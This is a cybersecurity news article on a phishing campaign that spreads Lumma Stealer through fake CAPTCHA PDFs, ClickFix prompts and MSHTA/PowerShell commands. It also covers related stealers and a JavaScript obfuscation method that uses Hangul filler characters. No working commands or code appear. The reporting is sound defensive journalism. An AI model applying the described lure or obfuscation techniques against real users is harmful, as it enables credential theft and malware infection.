Researchers specializing in cybersecurity have recently discovered a widespread phishing campaign that utilizes fake CAPTCHA images embedded in PDF documents, hosted on Webflow’s content delivery network (CDN), to disseminate the Lumma stealer malware.

A report by Netskope Threat Labs revealed that they identified 260 distinct domains hosting approximately 5,000 phishing PDF files, which redirect victims to malicious websites.

According to security researcher Jan Michael Alcantara, “The attacker employs search engine optimization (SEO) techniques to trick victims into visiting the pages by clicking on malicious search engine results,” as stated in a report shared with The Hacker News.

“Unlike most phishing pages that focus on stealing credit card information, some PDF files contain fake CAPTCHAs that deceive victims into executing malicious PowerShell commands, ultimately leading to the Lumma Stealer malware.”

This phishing campaign is estimated to have affected over 1,150 organizations and more than 7,000 users since the second half of 2024, with the attacks primarily targeting victims in North America, Asia, and Southern Europe across the technology, financial services, and manufacturing sectors.

Among the 260 domains identified to host the fake PDFs, the majority are related to Webflow, followed by those related to GoDaddy, Strikingly, Wix, and Fastly.

Attackers have also been observed uploading some of the PDF files to legitimate online libraries and PDF repositories, such as PDFCOFFEE, PDF4PRO, PDFBean, and Internet Archive, so that users searching for PDF documents on search engines are directed to them.

The PDFs contain fraudulent CAPTCHA images that serve as a conduit to steal credit card information. Alternatively, those distributing Lumma Stealer contain images to download the document that, when clicked, take the victim to a malicious site.

The site masquerades as a fake CAPTCHA verification page that employs the ClickFix technique to deceive the victim into running an MSHTA command that executes the stealer malware by means of a PowerShell script.

Recently, Lumma Stealer has also been disguised as Roblox games and a cracked version of the Total Commander tool for Windows, highlighting the various delivery mechanisms adopted by threat actors. Users are redirected to these websites through YouTube videos likely uploaded from previously compromised accounts.

“Malicious links and infected files are often disguised in YouTube videos, comments, or descriptions,” Silent Push said. “Exercising caution and being skeptical of unverified sources when interacting with YouTube content, especially when prompted to download or click on links, can help protect against these growing threats.”

The cybersecurity company further found that Lumma Stealer logs are being shared for free on a relatively new hacking forum called Leaky[.]pro that went operational in late December 2024.

Lumma Stealer is a fully-featured crimeware solution that’s offered for sale under the malware-as-a-service (MaaS) model, giving a way to harvest a wide range of information from compromised Windows hosts. In early 2024, the malware operators announced an integration with a Golang-based proxy malware named GhostSocks.

“The addition of a SOCKS5 backconnect feature to existing Lumma infections, or any malware for that matter, is highly lucrative for threat actors,” Infrawatch said.

“By leveraging victims’ internet connections, attackers can bypass geographic restrictions and IP-based integrity checks, particularly those enforced by financial institutions and other high-value targets. This capability significantly increases the probability of success for unauthorized access attempts using credentials harvested via infostealer logs, further enhancing the post-exploitation value of Lumma infections.”

The disclosures come as stealer malware like Vidar and Atomic macOS Stealer (AMOS) are being distributed using the ClickFix method via lures for the DeepSeek artificial intelligence (AI) chatbot, according to Zscaler ThreatLabz and eSentire.

Phishing attacks have also been spotted abusing a JavaScript obfuscation method that uses invisible Unicode characters to represent binary values, a technique that was first documented in October 2024.

This approach entails making use of Unicode filler characters, specifically Hangul half-width (U+FFA0) and Hangul full-width (U+3164), to represent the binary values 0 and 1, respectively, and converting each ASCII character in the JavaScript payload to their Hangul equivalents.

“The attacks were highly personalized, including non-public information, and the initial JavaScript would try to invoke a debugger breakpoint if it were being analyzed, detect a delay, and then abort the attack by redirecting to a benign website,” Juniper Threat Labs said.